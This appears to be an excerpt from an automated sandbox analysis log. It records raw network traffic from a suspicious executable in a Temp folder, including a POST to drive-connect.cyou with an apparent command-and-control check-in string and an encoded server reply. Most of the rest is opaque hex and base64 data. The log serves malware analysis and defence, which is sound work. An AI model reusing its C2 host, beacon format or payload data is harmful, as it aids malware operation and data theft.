                                                                                                                                                                                              2024-12-16 00:01:45 UTC16384INData Raw: d2 96 37 19 31 73 3a cd e2 bd 6c 6f fd a8 9e b7 05 f7 d7 60 f6 d9 52 b7 4a 89 fc 3f e6 cd 11 07 68 68 59 9a f0 ce 61 a8 cf b3 9b e8 75 50 00 70 2d 21 70 b7 24 30 43 69 2b 1a d2 e0 08 7a 2a 42 54 ed 19 df 8a d9 94 68 ba 82 5e 7d 0d 08 61 0b 98 7e d3 51 a5 c1 7b 42 fe 19 4e f5 b2 54 78 c4 8f 52 ef d1 cc 0a 50 75 fc 9b 5e 52 2d 4c 7b 17 26 00 4b 25 be 3e e0 32 d4 7d 99 82 3e 9b f0 09 c8 10 b9 80 55 c4 b1 77 63 a5 e7 7b b4 b3 d8 12 86 5f b8 b5 81 49 1c ba 09 17 4c 6c 43 fa 4c 6e eb e4 87 df e6 89 d7 eb 3b dc a3 8a f8 f8 3d 4e 17 af 08 14 65 20 71 44 6f 20 d9 7a 69 a5 0d 37 87 5b 25 2b e1 14 1c d2 b2 51 44 df e5 0e 48 fc 24 7e 84 2f 47 37 0c 10 aa 6a 97 d0 30 aa a2 31 34 db 0b 18 a2 c2 97 30 80 d0 ad ea 38 90 7b 41 ef fe 4a 35 0b bf 1a fd b2 94 7b 74 d5 0a 62
                                                                                                                                                                                              Data Ascii: 71s:lo`RJ?hhYauPp-!p$0Ci+z*BTh^}a~Q{BNTxRPu^R-L{&K%>2}>Uwc{_ILlCLn;=Ne qDo zi7[%+QDH$~/G7j01408{AJ5{tb
                                                                                                                                                                                              2024-12-16 00:01:45 UTC16384INData Raw: 06 d2 66 25 15 75 c4 c3 5f 67 76 25 e8 20 7b 4c 61 52 63 03 da 81 14 f8 05 87 c7 00 d3 6d 12 e5 6a 62 76 c6 ad f6 a9 72 21 b3 ea 5c b2 3b de a6 e9 30 06 21 7f b0 fb 06 3a a6 e1 22 34 64 db f7 72 b2 d7 e6 1e 6d d4 c1 4f 05 d3 c9 df df 8f 6b 20 00 ec 90 1f b4 74 1a 8f 15 5e 44 be 86 55 5c 6e d5 f8 18 cf 1e 1e e8 19 43 42 c0 ad fe d2 62 26 b5 7d 5d aa 2d 59 fc 54 ba 57 7c ed 51 cc 7a 6c 9a e6 8b 4c 3b 7b 8e 73 f8 bc ac 48 71 e5 9a 13 7e 0c 16 95 80 b3 1d ad 0d e0 12 d8 6f 8c cc 9f 3b d1 dc 7b d4 3d 7a 04 2e 72 b5 c0 b2 c9 11 74 49 57 87 c8 1b 65 73 85 8b 73 4a 48 2d 88 77 75 b0 62 ce 23 6e 78 75 cc d1 86 0c 1e 23 56 f9 78 57 f1 2a c1 06 4d 82 c0 52 df 60 9b c6 86 36 3b 30 ca e4 67 1d 64 5b cc 4d 4e 1c bf fc a8 12 1c 16 da 59 7d ac 49 da 4f 7c d4 8e 78 7d b6
                                                                                                                                                                                              Data Ascii: f%u_gv% {LaRcmjbvr!\;0!:"4drmOk t^DU\nCBb&}]-YTW|QzlL;{sHq~o;{=z.rtIWessJH-wub#nxu#VxW*MR`6;0gd[MNY}IO|x}
                                                                                                                                                                                              2024-12-16 00:01:45 UTC16384INData Raw: 9e 16 e4 74 ff a2 04 3a e7 c0 eb b1 9b 5a 5f b6 55 a6 61 f3 7a 05 1e 09 ef 41 3f 03 84 b7 cd ce e2 59 f0 91 80 1d 45 ae cd 26 68 1d f4 c2 5f 11 7e ab 76 34 7a 5d 9b bf d6 db 0a 22 eb 72 5a e2 32 2f dd 12 af 69 16 d2 13 a8 7e 6f bd 9c f9 74 a1 cf bb c4 18 25 00 d4 18 44 ca 2f 9f c7 6e 35 44 39 78 4e fa 5e a2 d5 c2 07 a0 93 17 23 ba d6 b2 f3 59 ec 98 64 4e f8 79 83 5c e5 fe f4 69 fc 8d b0 91 be 63 46 7d 5b 92 b8 6e 01 4e 20 70 41 eb 2b e0 ca 1f ba 36 20 f7 17 1b 50 9c 79 1e 98 6c e4 00 46 f5 5f 34 f7 36 37 30 0f 88 ca 58 6d 1d 70 d0 04 bb a9 f7 11 47 4c 58 f5 33 99 9b 76 b0 cc 11 91 11 e7 ac ee ce 32 1a 16 f3 36 7a 35 67 10 7b f3 20 73 84 d1 10 b3 74 5d ba 2a c3 af 90 e4 89 cf 85 d4 65 82 25 8d 57 45 8c 6c c5 ad cc 12 b9 18 42 f3 38 ce 1b 94 70 72 44 83 4b
                                                                                                                                                                                              Data Ascii: t:Z_UazA?YE&h_~v4z]"rZ2/i~ot%D/n5D9xN^#YdNy\icF}[nN pA+6 PylF_4670XmpGLX3v26z5g{ st]*e%WElB8prDK
                                                                                                                                                                                              2024-12-16 00:01:45 UTC16384INData Raw: ef 48 a5 0b 34 48 ab 14 62 60 8a c2 a3 6f 3a 8f 9f b6 a5 fa 35 0e 29 a5 18 d0 d9 9f 56 e6 a8 84 42 62 08 b5 d2 6b a7 b9 63 4a 19 5e c9 9a 58 91 66 a0 a2 2c 41 55 ee 51 7f 37 d5 86 fb bd 63 d3 eb b1 5f 5c 6b bf 35 fc 1b c7 ae 3c 15 a9 71 3e 40 d0 c0 cc fd f2 05 41 d8 e8 3d 1e 0b 8b 28 2e 71 6e 9b 78 7a 3b 82 0c 52 59 c2 18 8e a4 a9 4f 52 85 5e 1b 61 e8 98 14 25 ac ca fe 97 e0 0f 45 3f 48 57 47 ec 0d 9a f4 41 7d ac bf cc 06 d2 cf d1 dd 6d 3e 12 58 2b f0 ba b9 21 6d 7d 38 d0 26 67 f8 77 ef 28 f8 0f a5 cc 95 70 60 6b 3b 7c f5 e5 af fb 40 7c e2 26 4c 21 9f b2 90 b6 95 5b f6 d1 7b a9 fa 22 47 e4 a5 8d 8a 24 15 ea 2f af f5 28 c5 f7 b6 4e 5f 4e a1 5b 27 75 f3 5a 49 61 02 0e 25 df 8a bc cf b1 d2 99 00 54 6b a9 68 44 62 96 2c 80 4f 4a ef d4 97 74 9f bc 86 5f d4 2e
                                                                                                                                                                                              Data Ascii: H4Hb`o:5)VBbkcJ^Xf,AUQ7c_\k5<q>@A=(.qnxz;RYOR^a%E?HWGA}m>X+!m}8&gw(p`k;|@|&L![{"G$/(N_N['uZIa%TkhDb,OJt_.
                                                                                                                                                                                              2024-12-16 00:01:45 UTC16384INData Raw: 2d 1d eb f8 0d 7d ce 2f 94 3f f2 35 3a b9 21 31 7b 87 c9 16 f4 be 48 f8 e3 86 aa a0 56 29 04 7a d6 29 0b 1c 03 3e 2a 16 cb 03 dc fe ff 09 74 2d 1c 67 62 25 9a ee e8 1e f9 96 49 19 7c 7b 18 b9 4f 06 75 78 45 22 03 5a 6b e3 47 5e a1 63 3e 33 37 9e 71 92 e8 71 e0 4e 9f 26 62 9c 07 8d 4a 17 ff 96 46 bc b7 ba 8a 12 18 fb b6 a9 8c 8f 30 00 cf c3 ca 22 76 ed 10 7c 75 0a f8 77 f7 c5 85 44 b0 94 22 82 16 33 a4 13 9c e3 dd 99 67 41 0c 32 d9 7b 3b a3 b1 51 e6 74 be dd 05 37 d6 49 99 57 f6 9a 3c 8d 40 57 e9 cd 56 7f a7 50 71 ce b9 d5 b4 c9 3e 41 0c 97 46 ae 4a d3 9c 22 ac 69 2e e5 47 2d 56 21 89 e6 b2 a3 0c c5 e0 69 13 c8 63 77 1a 76 0f ee a7 67 16 28 9b 77 91 f9 c6 84 5a fb ff 4b ed 78 5b 0a 27 a3 ac a9 a7 50 8d eb 9d 40 82 89 23 84 d3 62 d4 a6 ca bf 44 e8 48 d6 71
                                                                                                                                                                                              Data Ascii: -}/?5:!1{HV)z)>*t-gb%I|{OuxE"ZkG^c>37qqN&bJF0"v|uwD"3gA2{;Qt7IW<@WVPq>AFJ"i.G-V!icwvg(wZKx['P@#bDHq
                                                                                                                                                                                              2024-12-16 00:01:45 UTC16384INData Raw: d4 58 34 7d 27 78 c5 1d 63 d9 c5 2d 01 91 5e 81 d9 d9 94 e2 d9 72 e5 ff 0f a7 f0 25 1b ea 14 0c 13 26 40 fe a2 cb f2 83 50 c6 9e 87 a7 01 8d 10 11 b1 25 24 34 39 cc eb 0c 73 ef cc b5 7e 0b 31 c6 98 db e9 87 6d 13 c1 26 65 22 1f 79 84 4a 27 11 a9 61 c6 9a 20 d7 3a da 16 df e5 55 cf 00 9f a6 29 28 09 3e c1 eb f9 ad 62 0b 47 69 a0 7e 65 60 02 f8 3c ea 4e b2 95 82 92 c8 1c c8 27 82 3d 29 29 df c1 58 83 29 33 c2 b4 73 cf 16 b0 2c 1e 19 70 64 de 36 d1 de f2 6a 96 ed dd ce a9 64 3f b2 ca 5d 21 e4 f9 9c c4 50 45 94 04 ee 6e 4f c9 d8 4a 99 c5 96 b5 89 ab c0 eb 66 90 94 7d 2b 70 b0 2d ad 8b e2 b5 bc d0 ea 86 db 33 56 c6 cb af f3 f0 69 a7 27 59 87 1b f5 13 5b 5d 71 9c a4 8d 01 82 56 0f fa 88 db 1e e4 0e b3 70 15 d5 f6 d9 76 1e 1a 31 c1 cb 17 67 89 91 cc ea e7 f2 7e
                                                                                                                                                                                              Data Ascii: X4}'xc-^r%&@P%$49s~1m&e"yJ'a :U)(>bGi~e`<N'=))X)3s,pd6jd?]!PEnOJf}+p-3Vi'Y[]qVpv1g~
                                                                                                                                                                                              2024-12-16 00:01:45 UTC16384INData Raw: 09 59 63 b0 49 85 74 1f d0 0b 7f 5a b1 5a 4b a9 28 5f da e5 c1 b1 17 ca 66 33 f4 30 fd 1c d3 0d 6c fb 75 0c 21 27 eb 95 68 cc 61 64 ec 87 b7 5d bd 2f cb ce 42 12 6b 01 be e2 f0 b4 e4 30 a7 b5 2f a0 50 30 2e e0 d8 85 20 45 a5 c9 ae 67 c4 7f af 61 13 c8 c6 01 c8 18 25 5e cf 7b d4 a0 2c 3e e3 c5 85 44 b6 58 9e 0c a2 e5 1e 9d b9 97 ba fc 60 4f fd 8b c2 d7 26 13 e1 05 59 59 40 05 d8 e1 7a 5f d7 a4 02 39 6f 65 86 94 64 1a 32 97 e3 c9 24 14 15 8a e6 53 fa bb 97 e5 50 85 b7 02 4f 7a 47 be 3d e1 3e 03 07 78 79 1a 5f 90 72 ae 90 b5 c7 d5 fd f4 44 0e 9a 51 4d aa c2 cb 9f 8c a0 74 c9 99 1b 1f d9 bf e1 9b 32 1c d3 16 e8 64 1e 6b 9c 16 a8 cf fc 3b 16 d7 c5 b6 14 8a d9 03 0e 6d d8 48 d1 ee 24 50 2f 32 0f 5d 0a 01 95 66 a5 53 85 7e d9 af 7a 00 83 94 02 e5 02 fb 47 e6 0e
                                                                                                                                                                                              Data Ascii: YcItZZK(_f30lu!'had]/Bk0/P0. Ega%^{,>DX`O&YY@z_9oed2$SPOzG=>xy_rDQMt2dk;mH$P/2]fS~zG
                                                                                                                                                                                              2024-12-16 00:01:45 UTC16384INData Raw: 9c 8d 7a 6b b8 9f 99 eb d5 91 c0 c6 da 5e 51 85 93 57 34 91 c8 f7 ec 1e 86 4b 9d 97 3d 79 e6 de 7d 42 b0 3f 4c 86 c1 29 5e b0 1e 9f 2a b1 b1 06 c6 18 3b d9 5a fd 77 84 21 c8 3c ce b1 7d a9 d2 04 89 c3 3d 56 0c 08 cf ff e2 e7 23 93 22 58 e6 1c 95 56 77 5b ee 3b 26 07 28 59 94 49 53 f4 1f 4d 4d e7 1f 19 81 8a 98 09 10 ac b7 6d dd 87 bb 93 a4 f3 ad 05 2a ec 8b 1e 13 31 ff 86 fb aa d2 df 34 ac cb 25 2d e5 ba 7d 6f d5 6e 97 43 45 c0 fe 2b 4c 85 dc bf 7d 54 5e 12 74 d6 ab 5e 8b b8 b9 74 8b 17 5d a5 73 ba 0c 32 8f 51 36 4f 20 d4 db 8f be 77 24 02 da 39 04 33 76 ec e0 c7 88 77 4e 1f 63 3f 82 8e 24 39 02 32 ad 18 eb 9a 87 40 c4 aa 26 b4 b4 d4 00 ea bb b9 0e 35 5a cb 23 cb 1a eb 7e 3a 38 1f 9d fb 14 a1 e3 40 88 d7 a4 d7 5f 6e 0c 9f ba 2b 54 e4 80 be 0b be b2 04 0e
                                                                                                                                                                                              Data Ascii: zk^QW4K=y}B?L)^*;Zw!<}=V#"XVw[;&(YISMMm*14%-}onCE+L}T^t^t]s2Q6O w$93vwNc?$92@&5Z#~:8@_n+T


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              5192.168.2.449866104.21.79.74436976C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:01:48 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 46
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:01:48 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                                              2024-12-16 00:01:48 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:48 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=7tjhmrl9sppdkkhhrrqs86lqtc; expires=Thu, 10-Apr-2025 17:48:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJjR%2BOu6IZwXNoEuHmQcw7QOq6zyCrD8VtdVxR7MDGCYMCVrwDNJ85ZYijBm692AcNKpOpDco6f0%2B5k75XByUXYcnzVa8vsYoldACZc%2B%2Bj8njLkUoctacBvJebx1UwT%2BSIttiuY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8f2a66a62a1e4294-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2162&min_rtt=1825&rtt_var=1359&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=948&delivery_rate=645446&cwnd=213&unsent_bytes=0&cid=3eda780f8898514d&ts=745&x=0"
                                                                                                                                                                                              2024-12-16 00:01:48 UTC350INData Raw: 34 39 31 63 0d 0a 7a 69 57 4b 56 65 2b 32 5a 73 41 6e 68 4a 59 64 6c 58 2f 55 6e 65 6d 34 35 36 50 45 38 38 78 71 6c 73 66 45 4e 47 77 64 54 36 4f 31 42 2f 78 33 31 59 4a 4b 34 6c 54 68 74 43 66 68 44 61 48 34 78 5a 71 47 78 2b 62 4a 71 67 76 36 74 4b 45 59 54 6d 73 69 67 66 52 44 36 7a 6d 63 30 30 72 69 51 76 79 30 4a 38 34 45 39 76 69 48 6d 74 32 42 6f 5a 6d 75 43 2f 71 6c 70 56 38 44 62 53 50 41 70 6b 6e 74 50 59 72 56 41 71 46 4c 36 66 4e 34 38 42 36 2b 38 34 44 56 6a 38 37 6d 33 2b 34 50 37 4f 58 2b 46 69 46 34 4f 38 4b 44 52 50 6b 2b 7a 63 74 4b 75 77 58 68 2b 44 2b 76 58 62 58 34 69 39 53 42 78 36 2b 62 70 41 4c 79 70 4b 42 65 48 48 51 70 79 36 5a 48 37 6a 79 41 33 42 61 73 51 65 37 34 66 76 6f 65 39 72 48 4c 33 5a 32 42 2f 74 48 39 4f 76 65 30 74
                                                                                                                                                                                              Data Ascii: 491cziWKVe+2ZsAnhJYdlX/Unem456PE88xqlsfENGwdT6O1B/x31YJK4lThtCfhDaH4xZqGx+bJqgv6tKEYTmsigfRD6zmc00riQvy0J84E9viHmt2BoZmuC/qlpV8DbSPApkntPYrVAqFL6fN48B6+84DVj87m3+4P7OX+FiF4O8KDRPk+zctKuwXh+D+vXbX4i9SBx6+bpALypKBeHHQpy6ZH7jyA3BasQe74fvoe9rHL3Z2B/tH9Ove0t
                                                                                                                                                                                              2024-12-16 00:01:48 UTC1369INData Raw: 37 6a 6d 4d 32 51 53 77 54 65 33 2f 65 75 55 57 76 2f 4b 47 32 6f 6a 4c 71 5a 4b 75 44 2f 36 76 71 56 77 4b 63 69 44 48 72 45 65 6f 65 63 33 54 48 4f 49 64 70 74 64 36 35 78 71 36 36 63 6e 67 78 64 37 6f 69 4f 34 50 2b 4f 58 2b 46 67 5a 36 4c 73 4b 6e 53 4f 73 2f 68 73 59 45 73 45 50 72 38 57 33 78 47 4c 6a 31 69 4d 69 50 7a 36 43 53 70 77 50 39 6f 4b 46 53 54 6a 46 74 78 72 51 48 73 48 65 73 32 51 2b 75 54 2f 48 30 50 2b 68 54 72 37 2b 4d 31 73 57 5a 35 70 57 76 44 50 57 68 71 46 67 4b 63 79 76 50 6f 55 6a 75 50 59 33 54 44 71 70 4e 35 2f 6c 30 2b 42 32 7a 38 6f 2f 63 69 63 43 6a 30 65 42 49 38 37 33 6d 44 6b 35 52 4b 73 4b 2b 42 64 30 30 67 39 6f 44 74 41 58 35 75 6d 61 33 47 72 71 2f 30 35 71 4c 78 4b 6d 44 72 78 72 78 71 37 52 61 43 33 6b 67 77 71 4a
                                                                                                                                                                                              Data Ascii: 7jmM2QSwTe3/euUWv/KG2ojLqZKuD/6vqVwKciDHrEeoec3THOIdptd65xq66cngxd7oiO4P+OX+FgZ6LsKnSOs/hsYEsEPr8W3xGLj1iMiPz6CSpwP9oKFSTjFtxrQHsHes2Q+uT/H0P+hTr7+M1sWZ5pWvDPWhqFgKcyvPoUjuPY3TDqpN5/l0+B2z8o/cicCj0eBI873mDk5RKsK+Bd00g9oDtAX5uma3Grq/05qLxKmDrxrxq7RaC3kgwqJ
                                                                                                                                                                                              2024-12-16 00:01:48 UTC1369INData Raw: 39 6f 44 74 41 58 35 75 6d 61 33 47 72 71 2f 30 35 71 49 79 61 4f 55 6f 51 6e 2b 71 36 4e 63 41 6e 63 6a 77 72 35 49 37 44 65 42 33 41 36 76 53 2b 4c 38 64 76 77 57 73 50 2b 4b 30 4d 57 50 35 70 61 32 53 4b 7a 6c 6b 6c 45 43 63 69 4b 44 6d 55 54 6d 4f 59 72 43 52 4c 30 4c 2f 37 52 34 2b 31 33 75 76 34 66 54 68 63 71 73 6c 61 34 50 2b 61 43 6c 55 51 31 79 4b 73 75 69 51 4f 77 37 68 4e 6b 43 6f 6b 4c 69 38 57 33 79 46 4c 72 7a 79 35 54 46 78 72 37 52 39 6b 6a 62 6f 72 42 56 49 58 77 38 79 4f 78 59 70 69 37 4e 30 77 6a 69 48 61 62 7a 65 76 38 57 73 50 65 4c 79 49 44 50 72 5a 43 6b 44 76 57 6f 71 6c 41 4f 66 69 33 48 6f 45 66 76 4d 4a 2f 47 41 61 52 58 37 4c 51 78 74 78 71 75 76 39 4f 61 73 39 47 78 67 4c 68 4b 77 61 61 6f 57 41 6c 70 62 64 37 69 58 71 67 77
                                                                                                                                                                                              Data Ascii: 9oDtAX5uma3Grq/05qIyaOUoQn+q6NcAncjwr5I7DeB3A6vS+L8dvwWsP+K0MWP5pa2SKzlklECciKDmUTmOYrCRL0L/7R4+13uv4fThcqsla4P+aClUQ1yKsuiQOw7hNkCokLi8W3yFLrzy5TFxr7R9kjborBVIXw8yOxYpi7N0wjiHabzev8WsPeLyIDPrZCkDvWoqlAOfi3HoEfvMJ/GAaRX7LQxtxquv9Oas9GxgLhKwaaoWAlpbd7iXqgw
                                                                                                                                                                                              2024-12-16 00:01:48 UTC1369INData Raw: 42 4e 36 50 6c 30 2b 42 61 6b 2f 34 62 65 69 63 57 75 6d 71 52 49 75 75 57 68 54 6b 34 6e 62 66 53 68 53 4f 67 30 6d 35 51 62 37 46 79 6d 38 33 4f 33 52 66 62 7a 68 64 71 4b 7a 61 71 61 70 67 6e 34 71 36 46 54 42 33 63 6c 30 36 31 44 34 44 61 44 32 77 57 6d 51 4f 50 77 65 50 4d 62 75 62 2f 46 6d 6f 4c 5a 35 73 6e 75 4a 39 4f 51 35 48 63 30 50 7a 4b 50 74 51 66 76 4f 38 32 4d 52 4b 35 47 36 76 78 77 38 52 53 36 39 59 4c 52 69 63 71 69 6e 61 63 4e 38 71 53 6a 55 77 39 37 49 63 75 71 52 4f 73 34 67 74 73 4d 34 67 75 6d 38 32 65 33 52 66 62 61 6e 4e 47 4c 78 2b 61 4f 34 42 47 30 6f 71 6f 57 56 6a 38 68 79 4b 70 42 37 54 75 4d 30 67 79 6e 54 65 4c 31 65 66 45 65 75 66 75 4f 32 34 72 46 71 70 2b 6b 43 66 57 70 72 56 6b 46 65 6d 32 50 37 45 44 77 64 39 57 55 4e
                                                                                                                                                                                              Data Ascii: BN6Pl0+Bak/4beicWumqRIuuWhTk4nbfShSOg0m5Qb7Fym83O3RfbzhdqKzaqapgn4q6FTB3cl061D4DaD2wWmQOPwePMbub/FmoLZ5snuJ9OQ5Hc0PzKPtQfvO82MRK5G6vxw8RS69YLRicqinacN8qSjUw97IcuqROs4gtsM4gum82e3RfbanNGLx+aO4BG0oqoWVj8hyKpB7TuM0gynTeL1efEeufuO24rFqp+kCfWprVkFem2P7EDwd9WUN
                                                                                                                                                                                              2024-12-16 00:01:48 UTC1369INData Raw: 78 64 50 67 52 39 72 48 4c 33 5a 32 42 2f 74 47 41 41 2b 65 79 70 56 67 46 61 54 61 42 73 77 6e 78 64 34 72 59 52 50 6f 46 35 66 39 30 38 78 32 36 2f 34 2f 58 68 64 4f 70 6c 71 6b 42 2f 37 65 73 55 51 6c 30 4a 63 71 6a 51 66 6f 37 67 38 59 42 73 46 65 6d 75 6a 2f 77 42 66 61 6e 79 2b 79 43 30 62 61 53 37 44 6e 69 70 72 42 64 41 33 4e 74 33 75 4a 65 71 44 43 42 6c 46 7a 69 51 2b 6e 39 66 50 67 63 76 2f 4f 47 33 34 7a 45 70 35 65 71 41 76 36 6c 6f 46 41 50 65 69 66 43 72 55 33 68 4d 49 58 54 42 37 41 46 71 4c 52 34 37 31 33 75 76 36 4c 64 6c 38 2b 32 30 62 46 47 37 65 57 68 57 6b 34 6e 62 63 57 6d 53 4f 77 77 67 64 49 42 70 45 6a 6e 2b 33 37 33 45 72 4c 30 67 74 79 45 7a 4b 4f 63 71 68 72 2b 72 71 6c 61 42 33 4d 67 67 65 49 48 37 79 2f 4e 6a 45 53 54 53 4f
                                                                                                                                                                                              Data Ascii: xdPgR9rHL3Z2B/tGAA+eypVgFaTaBswnxd4rYRPoF5f908x26/4/XhdOplqkB/7esUQl0JcqjQfo7g8YBsFemuj/wBfany+yC0baS7DniprBdA3Nt3uJeqDCBlFziQ+n9fPgcv/OG34zEp5eqAv6loFAPeifCrU3hMIXTB7AFqLR4713uv6Ldl8+20bFG7eWhWk4nbcWmSOwwgdIBpEjn+373ErL0gtyEzKOcqhr+rqlaB3MggeIH7y/NjESTSO
                                                                                                                                                                                              2024-12-16 00:01:48 UTC1369INData Raw: 44 37 7a 30 6a 74 65 49 7a 4b 57 58 71 41 50 34 74 36 39 57 44 58 52 74 6a 2b 78 41 38 48 66 56 6c 43 65 31 55 2b 7a 7a 63 2b 45 57 74 2f 79 64 31 35 57 42 36 4e 47 2f 44 2b 58 6c 2f 6b 41 65 61 43 72 65 34 6c 36 6f 4d 49 47 55 58 4f 4a 44 37 2f 4a 34 38 52 4f 6b 2b 6f 33 56 69 73 69 76 6c 61 59 4c 39 4b 47 69 55 51 74 38 49 63 71 72 52 4f 63 7a 68 4e 6f 4e 72 51 57 6f 74 48 6a 76 58 65 36 2f 71 73 47 47 7a 61 76 52 73 55 62 74 35 61 46 61 54 69 64 74 7a 61 4a 43 36 44 32 4c 30 41 47 6b 54 2b 50 30 64 50 51 53 73 76 6d 50 31 59 58 4b 72 35 43 6f 44 66 36 75 6f 46 73 4e 65 53 75 42 34 67 66 76 4c 38 32 4d 52 49 4a 65 36 2f 68 34 74 77 4c 34 35 73 76 64 69 59 48 2b 30 61 55 45 38 4b 4b 6d 57 77 31 33 4b 4d 57 6d 51 75 67 2f 6e 39 77 45 70 56 66 30 39 48 62
                                                                                                                                                                                              Data Ascii: D7z0jteIzKWXqAP4t69WDXRtj+xA8HfVlCe1U+zzc+EWt/yd15WB6NG/D+Xl/kAeaCre4l6oMIGUXOJD7/J48ROk+o3VisivlaYL9KGiUQt8IcqrROczhNoNrQWotHjvXe6/qsGGzavRsUbt5aFaTidtzaJC6D2L0AGkT+P0dPQSsvmP1YXKr5CoDf6uoFsNeSuB4gfvL82MRIJe6/h4twL45svdiYH+0aUE8KKmWw13KMWmQug/n9wEpVf09Hb
                                                                                                                                                                                              2024-12-16 00:01:48 UTC1369INData Raw: 37 57 61 6c 38 4b 32 6b 71 45 5a 79 75 58 2b 54 7a 41 2f 4a 74 65 72 56 2b 73 68 68 74 6b 49 73 33 75 6d 72 43 75 6c 54 2b 53 74 32 63 58 46 33 70 6e 66 37 67 6d 30 2f 5a 39 50 54 6d 6c 74 6d 66 34 4a 71 43 58 4e 6a 45 54 6c 52 76 54 6d 65 66 51 4c 74 62 69 31 35 4b 4c 58 72 4a 61 2b 44 2b 4f 71 35 68 68 4f 63 47 32 5a 6c 51 66 68 4d 4a 62 46 45 71 39 56 34 62 52 41 75 56 32 75 76 39 4f 61 73 4d 4b 6f 6e 36 6b 65 35 65 69 42 51 41 52 34 50 63 61 37 53 4b 68 35 7a 64 4a 45 2b 68 61 6f 74 48 76 6d 58 65 36 76 32 59 48 51 6b 76 48 42 2f 42 65 36 76 4f 5a 41 54 69 64 2f 6a 2b 78 56 71 47 2f 4e 6b 77 65 77 56 2b 44 33 61 66 52 61 69 4d 47 73 77 49 6a 48 73 59 43 51 4e 76 4f 2f 71 31 41 5a 62 6d 48 55 72 30 6e 6d 4d 4a 75 55 53 75 4a 4b 70 71 78 47 74 31 58 32
                                                                                                                                                                                              Data Ascii: 7Wal8K2kqEZyuX+TzA/JterV+shhtkIs3umrCulT+St2cXF3pnf7gm0/Z9PTmltmf4JqCXNjETlRvTmefQLtbi15KLXrJa+D+Oq5hhOcG2ZlQfhMJbFEq9V4bRAuV2uv9OasMKon6ke5eiBQAR4Pca7SKh5zdJE+haotHvmXe6v2YHQkvHB/Be6vOZATid/j+xVqG/NkwewV+D3afRaiMGswIjHsYCQNvO/q1AZbmHUr0nmMJuUSuJKpqxGt1X2
                                                                                                                                                                                              2024-12-16 00:01:48 UTC1369INData Raw: 57 54 2f 63 54 39 58 36 54 33 75 52 67 58 50 7a 75 42 39 42 57 6d 64 35 2b 55 58 4f 49 43 35 65 5a 74 38 52 36 67 2f 4d 7a 6b 75 2b 61 6f 6c 71 38 65 35 4c 4b 70 61 44 42 71 4c 73 2b 69 51 50 34 6d 7a 5a 70 45 72 51 57 2b 7a 54 2b 2f 58 59 6d 78 79 38 4c 46 6d 65 61 6b 72 51 62 36 6f 72 42 48 51 31 67 6a 78 71 31 52 2b 43 43 43 6c 45 72 69 51 36 61 73 4c 62 6c 64 73 75 37 4c 67 74 57 54 2f 63 54 39 58 36 54 33 75 52 67 58 50 7a 75 42 39 42 57 6d 64 35 2b 55 58 4f 49 43 35 65 5a 74 38 52 36 67 2f 4d 7a 6b 75 2b 61 6f 6c 71 38 65 35 4c 4b 70 47 53 42 4a 44 50 2b 53 55 75 73 35 67 39 4d 53 73 77 57 6f 74 48 43 33 52 59 2b 2f 77 35 71 36 6a 2b 61 4a 37 6c 43 30 6b 4b 56 59 41 48 67 37 30 4f 46 67 35 6a 43 4d 77 68 53 31 53 71 6e 61 53 64 5a 64 2b 4c 2b 4e 6d
                                                                                                                                                                                              Data Ascii: WT/cT9X6T3uRgXPzuB9BWmd5+UXOIC5eZt8R6g/Mzku+aolq8e5LKpaDBqLs+iQP4mzZpErQW+zT+/XYmxy8LFmeakrQb6orBHQ1gjxq1R+CCClEriQ6asLbldsu7LgtWT/cT9X6T3uRgXPzuB9BWmd5+UXOIC5eZt8R6g/Mzku+aolq8e5LKpGSBJDP+SUus5g9MSswWotHC3RY+/w5q6j+aJ7lC0kKVYAHg70OFg5jCMwhS1SqnaSdZd+L+Nm
